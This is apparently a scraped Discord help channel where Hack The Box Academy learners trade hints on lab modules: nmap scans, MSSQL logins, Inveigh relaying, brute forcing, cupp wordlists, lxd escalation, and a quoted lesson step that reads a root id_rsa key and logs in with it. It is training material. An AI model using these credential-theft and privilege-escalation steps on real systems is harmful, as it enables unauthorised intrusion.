@grand portal if you want to test the theory out yourself go spin it up and see

next bronze
#

again read the source code provided to find which function you can use

grand portal
fathom pendant
grand portal
fathom pendant
#

A glaringly obvious account

grand portal
#

this tip slipped through my mind. let me check

grand portal
fathom pendant
#

Not the first part

#

username:password

grand portal
fathom pendant
#

Otherwise you need to run as

grand portal
#

wait

#

i got a theroy, let me try

rustic sage
#

ftp doesn't even exist on the IP address

#

i even put the ftp port in as normal

#

"attacking common services" is the module

fathom pendant
#

Terminate then start the target again

rustic sage
#

I tried that aswell

fathom pendant
fathom pendant
#

Try removing the min-rate and see

rustic sage
#

yeah sure

fathom pendant
rustic sage
#

chance it skipped the port with min-rate

fathom pendant
#

As said, the question implies not standard

rustic sage
#

got it

#

rescanning right now

#

I really need a linux server nmap takes so long my wifi sucks

fathom pendant
rustic sage
rustic sage
fathom pendant
#

Not to mention you're already still sending the ICMP ping anyway

rustic sage
#

that is true

rustic sage
#

hi

grand portal
grand portal
#

it worked- why is that?

fathom pendant
#

Because that's how it's set up

jagged sandal
#

hi

grand portal
#

the same creds used for rdp, is being used with windwos login. right?

left egret
#

Hello, for the question "Introduction to Web Applications - HTML Injection ", what is the attended slogan ? I tried Your Cyber Performance Center but it is wrong. Any idea ?

jagged sandal
#

i'm new here and i want to follow the bug hunter roadmap. where should i start?
i know this topics already:
1- Python
2- Go
3- linux essential

rugged sonnet
#

hello ๐Ÿซก , I am new in the community!

dim wolf
#

e.g., ssh htb-student@10.129.254.254

grand portal
grand portal
# fathom pendant Just use windows login

im not able to login using mssqlclient.py i though i'd use query to find out user. To same server. in the gui version, we used the same credential, any suggestion?

stoic adder
next bronze
#

combine it with standard xss payload

stoic adder
vernal rover
#

Looking for some help installing any distro using WSL.

  1. I've successfully installed and verified I have WSL2 as default.
  2. I've successfully downloaded Ubuntu 24.04 LTS from the Windows Store.
  3. When I try to install I keep getting the following error in PowerShell:

WslRegisterDistribution failed with error: 0x80370109 Error: 0x80370109 The operation timed out because a response was not received from the virtual machine or container.

I've tried searching online for solutions but not having any luck. Thanks!

stoic adder
stoic adder
grand portal
strange pivot
#

.\Inveigh-Relay.ps1
PS C:\Users\Administrator\desktop> Invoke-InveighRelay -Target (ip)
Invoke-InveighRelay : The term 'Invoke-InveighRelay' is not recognized as the name of a cmdlet, function, script file,
or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and
try again.

any idea why i cant get Inveigh-Relay.ps1 to work ?

grand portal
#

alright i got the flag.

strange pivot
#

I wasn't importing the module ๐Ÿ˜„ bloody hell

fathom pendant
verbal dagger
#

not sure who wrote the active directory module, but really enjoying this one. good job

ashen pollen
#

confused because it states win/10 but windows is saying its win/11

dim wolf
rustic sage
#

marcilee the nmap scan took 4 hours i just fell asleep and woke up and it was still going lmfao

ashen pollen
dim wolf
#

it is good practice to use a virtual machine for any pentesting activity

rustic sage
#

yeah

#

or if u want just dual boot

ashen pollen
#

So do i download the Dev VM they link me?

rustic sage
#

makes everything easier 4 me

dim wolf
#

yep. choose the VM image based on the hypervisor you're using

ashen pollen
#

im using VMware workstation so i assume VMware?

dim wolf
#

yes

#

it's not really a hard requirement to set up a Windows VM, but it's helpful to have in some cases

fathom pendant
ashen pollen
fathom pendant
dim wolf
#

even when i want to compile something on windows, microsoft just doesn't let me (visual studio 2017)

rustic sage
fathom pendant
rustic sage
#

im a just continue once i finish something up

modest remnant
#

How can meterpreter reside "...entirely in the memory of the remote host and leaves no traces on the hard drive." and yet also be persistent across reboots?

sullen rapids
pseudo kiln
#

anyone knows why **cup **will not generate permutations for some strings that I specify ?

ebon crystal
# sullen rapids can anyone help me with: https://academy.hackthebox.com/module/77/section/844, 2...

SSH Keys
Finally, let us discuss SSH keys. If we have read** access over the .ssh directory** for a specific user, we may read their private ssh keys found in /home/user/.ssh/id_rsa or /root/.ssh/id_rsa, and use it to log in to the server. If we can read the /root/.ssh/ directory and can read the id_rsa file, we can copy it to our machine and use the -i flag to log in with it:

Xoriath@htb[/htb]$ vim id_rsa Xoriath@htb[/htb]$ chmod 600 id_rsa Xoriath@htb[/htb]$ ssh root@10.10.10.10 -i id_rsa

root@10.10.10.10#

fathom pendant
fathom pendant
ebon crystal
#

Yes, is the info provided by the lesson that can help

fathom pendant
#

Also nice alt xoriath

pseudo kiln
#

what ?

fathom pendant
#

Rather lead a horse to water than show them the direct answer

#

Considering the copy/paste from that account has your username in the @[/htb]$

#

:)

pseudo kiln
#

ah lol, wtf how come the copy paste of that guy has my name ?

fathom pendant
#

Weird ik

#

Unless they copied from one of your messages

sullen rapids
ebon crystal
#

just changed it lel

fathom pendant
sullen rapids
fathom pendant
sullen rapids
fathom pendant
#

My statement referred to viewing files, not sudo actions

pseudo kiln
#

anyway, just in case you might know, I am trying to generate password permutations with cupp and this string securesolacoders, but it's not generating any permutations with it. Is it because it's too long and cupp is too limited ?

sullen rapids
fathom pendant
#

:)

#

Especially if you're listing them

sullen rapids
#

okay this might sound dumb, but I unable to get it ๐Ÿ˜ฆ

#

ls

#

?

fathom pendant
#

Yes

#

To avoid torturing you

sullen rapids
fathom pendant
#

Also be sure to look for hidden files and directories

#

Especially in sensitive places like /root/

sullen rapids
fathom pendant
#

This boils down to basic file permissions in linux

fathom pendant
#

You need to find a way to get to root, one way or the other

sullen rapids
sullen rapids
fathom pendant
fathom pendant
sullen rapids
fathom pendant
#

One that was referenced in the reading

sullen rapids
fathom pendant
#

I don't recall how I transferred the zip over to the host. But I do recall just unzipping and grabbing the hash

fathom pendant
sullen rapids
#

how do I do that?

fathom pendant
#

ls --help

sullen rapids
#

ty! @fathom pendant I'll try solving it and let you know

plucky hollow
fathom pendant
plucky hollow
#

the horse will drown

fathom pendant
#

Giving the direct command does nothing but give them it. Teaching how to arrive at the flags to use is far more valuable

#

As the help blurb and man command are fairly useful for learning a command

limpid hemlock
#

Anyone knws how to use CDATA METHOD TO READ THE FLAG IN ADVANCED FILE DISCOLSURE SECTION

fathom pendant
sullen rapids
#

I solved the module @fathom pendant, thank you so much

#

found a hidden file which helped gained access

hasty willow
#

without any expirience is it better to start first HTB Certified Penetration Testing Specialist or HTB Certified Bug Bounty Hunter

#

?

fathom pendant
hasty willow
#

could you tell me what is the differencies ?

fathom pendant
#

CBBH focuses on web app testing, CPTS focuses on network testing

hasty willow
#

or which one is easier to start with

fathom pendant
#

Neither, they're both relatively hard

#

ยฏ_(ใƒ„)_/ยฏ

hasty willow
#

oh okay thanks for your help , i wamt to be pentester so i will focus on Certified Penetration Testing Specialist

gilded radish
#

tbh cbbh easier than cpts

gusty cloak
#

Anyone able to help with this module
https://academy.hackthebox.com/module/57/section/516

Login bruteforcing skills assessment - Service login

I created a custom username and password list and its going to take 5 hours to get through it. After reading other messages about this module the username list and password list should be correct. Any hints to save me 5 hours of time? currently been running for 30 min

fathom pendant
safe star
#

I got stuck too

gusty cloak
fathom pendant
#

4 may be too high

gusty cloak
#

for pass list i only used his first name and last name, special characters and leet mode as others suggested

fathom pendant
safe star
#

Yeah that should be enough

gusty cloak
#

yes i did that as well using sed

#

i was reading messages about not including numbers so i didnt do that this time around, is that right?

heady sleet
#

Can anyone tell me why the new web fuzzing module is teaching wenum to fuzz for parameters when we can do that faster and easier already with ffuf and the module and is teaching ffuf...

Honestly is a very old fork from wget...

I would like to Honestly understand why wenum and not keep using ffuf

fathom pendant
fathom pendant
#

Also it's a fork of wfuzz not wget

vestal glacier
#

hello everyone , this is my first time here. I actually want to unlock the linux fundamentals module but on clicking the "unlock 10" it just resizes my UI and dosen't let me unlock it ( I do have more cubes than it require ) . Any suggestion ?

safe star
#

Pretty sure itโ€™s the same as the one he demonstrates

gusty cloak
# safe star follow the password policy

i did in my initial one where it ran for 1 hour and found nothing. Let me try it one more time(i thought it was odd people were suggesting lists that went against the policy)

#

^ this was without -u though

heady sleet
heady sleet
#

I dont know whatever xD

fathom pendant
heady sleet
#

Yeah i kept using ffuf

fathom pendant
#

I found the techniques useful ยฏ_(ใƒ„)_/ยฏ

heady sleet
#

I felt very comfortable with the tool and have cero reason to mess with what i already can use effectively

vestal glacier
shut vapor
#

I'm definitely a metasploit noob though, so correct me if I'm wrong. Maybe there's trickery like embedding in the registry that's considered "fileless".

fathom pendant
gusty cloak
shut vapor
#

is it the registry thing, or piggybacking in an existing file?

safe star
#

Itโ€™s should take less than 20 secs

fathom pendant
gusty cloak
#

can i dm you

safe star
#

Yea

shut vapor
#

Ah, great. Thank you.

#

I feel like with hacking there's an ever-growing list of things that make me say "huh? I don't fully get that but I'm sure I'll pick up on it someday". Cross one off the list. ๐Ÿ˜…

fathom pendant
#

It's kind of more a means to say that the exploit isn't on the disk of the system it's running against

marsh echo
#

is it possible to follow the lxd tutorial into a docker container ? given that they have the same goal, is this going to be a problem? because I'm lazy to create a virtual machine :/๐Ÿ˜ญ

#

but there's no choice if you have to do it :/

quiet trout
vocal bridge
#

what did i get wrong?

marsh echo
quiet trout
#

oh right, yeah just install lxd then

fathom pendant
#

No need to do it on your system

#

lxd/lxc is already installed on the target alongside the image to use

stiff ravine
#

hey guys

#

I need help

#

nothing is going through can somebody set up a one time use encrypted email

#

for me

#

@here

stiff ravine
#

somebody did it for me before

fathom pendant
#

well we don't do that here

stiff ravine
#

wtf rule am i breaking

marsh echo
fathom pendant
#

also i'd heavily advise against sharing your email in a server that's full of hackers my guy, not everyone here is reputable

stiff ravine
#

@everyone fuck this server